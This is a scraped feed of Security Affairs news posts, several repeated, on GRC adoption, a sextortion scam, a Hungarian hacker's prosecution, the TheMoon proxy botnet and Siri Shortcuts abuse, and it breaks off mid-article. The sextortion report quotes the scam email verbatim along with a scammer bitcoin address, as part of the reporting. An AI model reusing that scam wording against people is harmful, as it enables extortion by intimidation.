The starting point is always the internal policies or external regulations that guard the organizational boundaries or in social life the human rights! These policies are the key to governance or success of the entire GRC Program in an organization. Policies define the boundaries which would act as the perimeter defence which needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance to these policies are tracked to closure according to the risk appetite. This standardization could be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

3 major objections are as follows: –

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Internal team consuming the GRC features in day to day activities is very less which means the adoption by the internal risk or compliance team itself is less. So how to change this behaviour? (faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of GRC platform…many think its an added cost and hence continue with manual process…only to create more risk in their organization which keeps piling up!

To add to this with various automation products, document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at all the world’s biggest historical events that have happened (be it the Martin Luther King, Jr. Civil Rights movement or Mahatma Gandhi Satyagraha or non -cooperation movement or the invention of Printing Press), are primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

GRC

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world…because the collective actions of the social movement play an important role in bringing social change and also there was a need for the movement since a common message was not articulated or there was a lack of direction. Similarly, there is a need to creating a GRC movement in the enterprises. This movement will bring about risk cultural change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:-

Organization need a better approach to tackle cybersecurity and risk! I propose an approach to having a 360 degree view to make a GRC Movement happen.

This 360 degree GRC movement can be achieved using three aspects as follows:-

GRC for Enterprise:- (Contextual)

Are applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes then what kind of use cases? Might not be different but would be architectured or developed or configured differently.

Example: Every traffic signal has 3 alert lights globally but the traffic model in India is different than US or Australia or Europe (Parameters like traffic density, road width, peak time etc are all different for various economy) and similarly Autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the new policy…coz there is no right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera comes which sees through the walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which the users can create reports, dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution within the enterprise users.

Any innovation doesn’t hurt users…users are hurt coz change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise: (Ownership)

The organization goes through complete chaos if risk process is handled manually …hence if you digitise risk…then you are in more control over your data which would lead to more visibility!

As the GRC Platform of the enterprise matures, it would become the protected property or IP of the organization…its too risky for any organization to handle the governance & compliance aspects or tasks manually…as even a single miss of an event or an incident can bring the organization down financially. The enterprises need to be alert 24×7 but the hackers need to get in just once! The Risk or compliance team within the enterprise know the genesis of every problem and only they can solve it using automation to reduce the efforts and manual error for the long-term gains.

Privacy and Accountability of the data of GRC tool…is a critical aspect hence various compliance to regulations like GDPR would be the key for a successful GRC journey! Without mapping the controls to the policy or corporate objective to check which policy violation has happened, the core purpose of integrated GRC platform will never be achieved! This will lead to accountability in the org!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

By simply training employee would not be enough and hence its crucial to take the process maturity and standardization achieved through the GRC platform ahead consistently. Revisiting the various workflows, KPI and metrics and fine tuning it to suit the ever-changing cyber world is the key!

GRC platform for an already established and matured organization would be different as compared to newly formed organization.

For this the GRC management would need to have a VC v/s PE mindset depending on the organizational maturity.

A Venture Capitalist would take a start-up and grow it exponentially…A PE will take an already established company to grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by an enterprise…which could be a case study for the industry to learn from!

Has there been an increase in the adoption of using the GRC platform for risk and compliance records after the enhancement in the user experience. The GRC group within the enterprise can contribute to the external world their learnings…

In the GRC space every organization hunts for the best practices which is implemented by other organization, but this data is publicly not available as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy ! Like climate change can be dealt with policy changes globally. Also we need to remember that no policy is written in stone as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would be in its adoption by all parties simultaneously. Its in everyone’s interest to collaborate and share the success stories with other enterprises without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence for a successful GRC Program an organization needs to have a GRC vision which comprises of all 3 above dimensions.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end to end experience of delivery, sales and presales. He has managed various markets like US Europe and Middle east in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.



Security Affairs

Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance Risk and Compliance (GRC) is about managing your enterprise data effectively but with data comes its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge in managing your inhouse data! (yes data the buzz word…”whoever controls the data ..controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected or what policy needs to be crafted that will protect the compliance of the various controls that are applied on the identified risks! Like the GDPR Law has shown comprehensive checks and deterrents to protect the EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17 ‘right to be forgotten’ in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries or in social life the human rights! These policies are the key to governance or success of the entire GRC Program in an organization. Policies define the boundaries which would act as the perimeter defence which needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance to these policies are tracked to closure according to the risk appetite. This standardization could be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

3 major objections are as follows: –

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Internal team consuming the GRC features in day to day activities is very less which means the adoption by the internal risk or compliance team itself is less. So how to change this behaviour? (faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of GRC platform…many think its an added cost and hence continue with manual process…only to create more risk in their organization which keeps piling up!

To add to this with various automation products, document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at all the world’s biggest historical events that have happened (be it the Martin Luther King, Jr. Civil Rights movement or Mahatma Gandhi Satyagraha or non -cooperation movement or the invention of Printing Press), are primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

GRC

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world…because the collective actions of the social movement play an important role in bringing social change and also there was a need for the movement since a common message was not articulated or there was a lack of direction. Similarly, there is a need to creating a GRC movement in the enterprises. This movement will bring about risk cultural change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:-

Organization need a better approach to tackle cybersecurity and risk! I propose an approach to having a 360 degree view to make a GRC Movement happen.

This 360 degree GRC movement can be achieved using three aspects as follows:-

GRC for Enterprise:- (Contextual)

Are applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes then what kind of use cases? Might not be different but would be architectured or developed or configured differently.

Example: Every traffic signal has 3 alert lights globally but the traffic model in India is different than US or Australia or Europe (Parameters like traffic density, road width, peak time etc are all different for various economy) and similarly Autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the new policy…coz there is no right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera comes which sees through the walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which the users can create reports, dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution within the enterprise users.

Any innovation doesn’t hurt users…users are hurt coz change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise: (Ownership)

The organization goes through complete chaos if risk process is handled manually …hence if you digitise risk…then you are in more control over your data which would lead to more visibility!

As the GRC Platform of the enterprise matures, it would become the protected property or IP of the organization…its too risky for any organization to handle the governance & compliance aspects or tasks manually…as even a single miss of an event or an incident can bring the organization down financially. The enterprises need to be alert 24×7 but the hackers need to get in just once! The Risk or compliance team within the enterprise know the genesis of every problem and only they can solve it using automation to reduce the efforts and manual error for the long-term gains.

Privacy and Accountability of the data of GRC tool…is a critical aspect hence various compliance to regulations like GDPR would be the key for a successful GRC journey! Without mapping the controls to the policy or corporate objective to check which policy violation has happened, the core purpose of integrated GRC platform will never be achieved! This will lead to accountability in the org!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

By simply training employee would not be enough and hence its crucial to take the process maturity and standardization achieved through the GRC platform ahead consistently. Revisiting the various workflows, KPI and metrics and fine tuning it to suit the ever-changing cyber world is the key!

GRC platform for an already established and matured organization would be different as compared to newly formed organization.

For this the GRC management would need to have a VC v/s PE mindset depending on the organizational maturity.

A Venture Capitalist would take a start-up and grow it exponentially…A PE will take an already established company to grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by an enterprise…which could be a case study for the industry to learn from!

Has there been an increase in the adoption of using the GRC platform for risk and compliance records after the enhancement in the user experience. The GRC group within the enterprise can contribute to the external world their learnings…

In the GRC space every organization hunts for the best practices which is implemented by other organization, but this data is publicly not available as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy ! Like climate change can be dealt with policy changes globally. Also we need to remember that no policy is written in stone as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would be in its adoption by all parties simultaneously. Its in everyone’s interest to collaborate and share the success stories with other enterprises without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence for a successful GRC Program an organization needs to have a GRC vision which comprises of all 3 above dimensions.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end to end experience of delivery, sales and presales. He has managed various markets like US Europe and Middle east in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs: Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible, a new variant of sextortion scam appeared in the threat landscape. A new sextortion scam campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script that records a visitor through their webcam.

In a classic social engineering scam, the emails sent to the victims also states inform them that hackers have stolen their data and contacts, the messages include a user’s old password obtained from third-party data breaches. Hackers threaten to publish the stolen material and the alleged videos if the victims will not pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts observed attackers using as bait the news of the hacked adult site.

Bleeping computers also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 

Sextorion scam

Is the campaign effective?

To give you the answer we have to check the balance of the bitcoin addresses included in the email used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019 received approximately .95 bitcoins ($3,200).

Unfortunately, sextortion scams are very profitable for crooks, they are very easy and cheap to arrange and associated risks are very low. 

Other variants of sextortion trick victims into installing malicious attachment that allow crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.



Security Affairs

Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible, a new variant of sextortion scam appeared in the threat landscape. A new sextortion scam campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script that records a visitor through their webcam.

In a classic social engineering scam, the emails sent to the victims also states inform them that hackers have stolen their data and contacts, the messages include a user’s old password obtained from third-party data breaches. Hackers threaten to publish the stolen material and the alleged videos if the victims will not pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts observed attackers using as bait the news of the hacked adult site.

Bleeping computers also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 

Sextorion scam

Is the campaign effective?

To give you the answer we have to check the balance of the bitcoin addresses included in the email used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019 received approximately .95 bitcoins ($3,200).

Unfortunately, sextortion scams are very profitable for crooks, they are very easy and cheap to arrange and associated risks are very low. 

Other variants of sextortion trick victims into installing malicious attachment that allow crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.

Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail

Hungarian police arrested a young hacker because he discovered and exploited serious vulnerabilities in the systems of the Magyar Telekom

Which are the risks for a hacker that decide to publicly disclose a vulnerability?

The case I’m going to discuss shows us legal implication for this conduct.

Last year, Hungarian law enforcement arrested a young hacker (20) because he discovered and exploited serious vulnerabilities in the systems of the Magyar Telekom, the major Hungarian telecommunication company.

Now the hacker is facing up to 8 years in prison.

According to the local media, in April 2018 the hacker found a serious security vulnerability in the website of the telco company, he exploited the issue to penetrate the telecommunications network.

The Hungarian youngster first reported the flaw the company that invited him to a meeting to discuss the possibility to let him test its systems.

The boy went to Budapest for the meeting, but the company did not permit him to conduct further tests on systems.

Magyar Telekom hack

However, the young hacker continued testing the Magyar Telekom networks and discovered another severe flaw in May. This second vulnerability could have allowed an attacker to access all public and retail mobile and data traffic, and monitor the servers of the firm.

“Negotiations were stalled, but the programmer continued to search for a more serious vulnerability that could allow access to all public and retail mobile and data traffic.” reported the Napi.hu website. 

“However, this was spotted by Telekom’s people, which Andras also noticed, and then abandoned testing. Telekom, on the other hand, filed a complaint for his action, and in three weeks, the police also appeared to him – recalls the HCLU.”

The activity of the hacker was detected by the experts at Magyar Telekom that reported the unauthorized intrusion to the police that arrested him.

The man is currently on trial and the Hungarian Prosecution Service requested a prison sentence. The non-profit human rights watchdog
Hungarian Civil Liberties Union is defending the boy. The Prosecutor’s Office argues that the action of the boy posed a serious risk for the society.

“The prosecutor’s office offered Andras a bargain that if he admitted his guilt, he would only receive a 2-year suspended prison, but if he did not avail himself of it, he would be sentenced to 5 years of download. All this, according to HCLU, the court did not see any evidence.” continues the local media.

The young hacker refused the plea deal, and the worst is that prosecutors have added other charges to the indictment, such as disrupting the operation of a “public utility.”

Due to the new charges, the boy now is risking to be condemned to 8 years if proven guilty.

Pierluigi Paganini

(SecurityAffairs – Magyar Telekom, hacking)

The post Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail appeared first on Security Affairs.

Security Affairs: Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail

Hungarian police arrested a young hacker because he discovered and exploited serious vulnerabilities in the systems of the Magyar Telekom

Which are the risks for a hacker that decide to publicly disclose a vulnerability?

The case I’m going to discuss shows us legal implication for this conduct.

Last year, Hungarian law enforcement arrested a young hacker (20) because he discovered and exploited serious vulnerabilities in the systems of the Magyar Telekom, the major Hungarian telecommunication company.

Now the hacker is facing up to 8 years in prison.

According to the local media, in April 2018 the hacker found a serious security vulnerability in the website of the telco company, he exploited the issue to penetrate the telecommunications network.

The Hungarian youngster first reported the flaw the company that invited him to a meeting to discuss the possibility to let him test its systems.

The boy went to Budapest for the meeting, but the company did not permit him to conduct further tests on systems.

Magyar Telekom hack

However, the young hacker continued testing the Magyar Telekom networks and discovered another severe flaw in May. This second vulnerability could have allowed an attacker to access all public and retail mobile and data traffic, and monitor the servers of the firm.

“Negotiations were stalled, but the programmer continued to search for a more serious vulnerability that could allow access to all public and retail mobile and data traffic.” reported the Napi.hu website. 

“However, this was spotted by Telekom’s people, which Andras also noticed, and then abandoned testing. Telekom, on the other hand, filed a complaint for his action, and in three weeks, the police also appeared to him – recalls the HCLU.”

The activity of the hacker was detected by the experts at Magyar Telekom that reported the unauthorized intrusion to the police that arrested him.

The man is currently on trial and the Hungarian Prosecution Service requested a prison sentence. The non-profit human rights watchdog
Hungarian Civil Liberties Union is defending the boy. The Prosecutor’s Office argues that the action of the boy posed a serious risk for the society.

“The prosecutor’s office offered Andras a bargain that if he admitted his guilt, he would only receive a 2-year suspended prison, but if he did not avail himself of it, he would be sentenced to 5 years of download. All this, according to HCLU, the court did not see any evidence.” continues the local media.

The young hacker refused the plea deal, and the worst is that prosecutors have added other charges to the indictment, such as disrupting the operation of a “public utility.”

Due to the new charges, the boy now is risking to be condemned to 8 years if proven guilty.

Pierluigi Paganini

(SecurityAffairs – Magyar Telekom, hacking)

The post Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail appeared first on Security Affairs.



Security Affairs

Security Affairs: Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.



Security Affairs

Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.

Security Affairs: IBM experts warn of malicious abuses of Apple Siri Shortcuts

IBM’s security researchers demonstrated that the Siri Shortcuts introduced in the Apple iOS 12 can be abused by attackers.

Apple implemented Siri Shortcuts in the iOS 12 to allow users to rapidly access to applications and features, they can automate common tasks and can be integrated by third-party developers in their software.

Researchers at IBM Managed Security Services discovered that
Siri Shortcuts can be abused by hackers to perform malicious activities.

“This new feature can be enabled via third-party developers in their apps, or custom built by users downloading the shortcuts app from the app store. Once downloaded and installed, the Shortcuts app grants the power of scripting to perform complex tasks on users’ personal devices.” reads the analysis published by IBM.

“But accessing the phone from Siri Shortcuts also presents some potential security risks that were discovered by X-Force IRIS and reported to Apple’s security team.”

Experts pointed out that Siri Shortcuts improve interactions between users and the device, it allows the implementation of access directly from the lock screen or through existing apps. Users can also share the Shortcuts from the apps via iCloud.

The shortcuts can be presented by developers on the lock screen or in ‘search’ field, based on time, location and context.

“The shortcut can then appear on the lock screen or in ‘search’ when it is deemed appropriate to show it to the user based on time, location and context.” continues the analysis.

“For example, a user approaches their usual coffee shop, and the relevant app pops up a shortcut on the screen to allow them to order the usual cup of java and pay for it on the app before they even enter the coffee shop.”

siri shortcuts

Experts at IBM explained that the new feature could be used to create for malicious purposes such as scareware, a pseudo ransom campaign that attempts to scare victims and trick them into paying attackers by making them believe their data were stolen by hackers.

The attackers can use native shortcut functionality, they can develop a script to provide the ransom demands to the device’s owner by using Siri’s voice. Attackers can also automate data collection from the device (user’s current physical address, IP address, contents of the clipboard, stored pictures/videos, contact information and more) and send them to the victims to scare them.

